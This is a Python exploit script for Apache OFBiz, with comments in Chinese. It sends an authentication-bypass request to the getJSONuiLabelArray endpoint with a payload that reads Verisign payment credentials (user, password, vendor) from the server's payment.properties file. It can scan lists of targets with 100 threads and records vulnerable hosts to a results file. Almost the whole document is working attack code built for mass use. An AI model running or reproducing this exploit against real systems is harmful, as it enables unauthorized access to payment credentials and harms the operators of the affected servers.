# Apache OFBiz SSRF && 任意配置读取
import requests,sys,argparse
from multiprocessing.dummy import Pool
requests.packages.urllib3.disable_warnings()

def banner():
    test="""                            _                  ____  ______ ____  _      
     /\                    | |                / __ \|  ____|  _ \(_)     
    /  \   _ __   __ _  ___| |__   ___ ______| |  | | |__  | |_) |_ ____ 
   / /\ \ | '_ \ / _` |/ __| '_ \ / _ \______| |  | |  __| |  _ <| |_  / 
  / ____ \| |_) | (_| | (__| | | |  __/      | |__| | |    | |_) | |/ /  
 /_/    \_\ .__/ \__,_|\___|_| |_|\___|       \____/|_|    |____/|_/___| 
          | |                                                            
          |_|                                                            

"""

    print(test)

def main():
    banner()
    parser=argparse.ArgumentParser(description='')
    parser.add_argument('-u','--url',dest='url',type=str,help='input the url')
    parser.add_argument('-f','--file',dest='file',type=str,help='input the file')
    args=parser.parse_args()
    if args.url and not args.file:
        poc(args.url)
    elif args.file and not args.url:
        url_list=[]
        with open(args.file,'r',encoding='utf-8')as fp:
            for url in fp.readlines():
                url_list.append(url.strip())
        mp=Pool(100)
        mp.map(poc,url_list)
        mp.close()
        mp.join()
    else:
        print(f"Usag:\n\t python3 {sys.argv[0]} -h")

def poc(target):
    url_payload= '/webtools/control/getJSONuiLabelArray/?USERNAME=&PASSWORD=s&requirePasswordChange=Y'
    headers={
        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Cache-Control':'no-cache',
        'Pragma':'no-cache',
    }
    data='requiredLabels={"file:applications/accounting/config/payment.properties":["payment.verisign.user","payment.verisign.pwd","payment.verisign.vendor"]}'

    try:
        res1=requests.post(url=target+url_payload,headers=headers,data=data,timeout=10)
        if res1.status_code==200:
            print( f"[+]{target} 存在漏洞！")
            with open('result.txt','a',encoding='utf-8')as fp:
                fp.write(target+'\n')
                return True
        else:
            print('[-] 不存在漏洞')
            return False
    except:
        print('目标网站存在问题，无法访问')

if __name__ =='__main__':
    main()
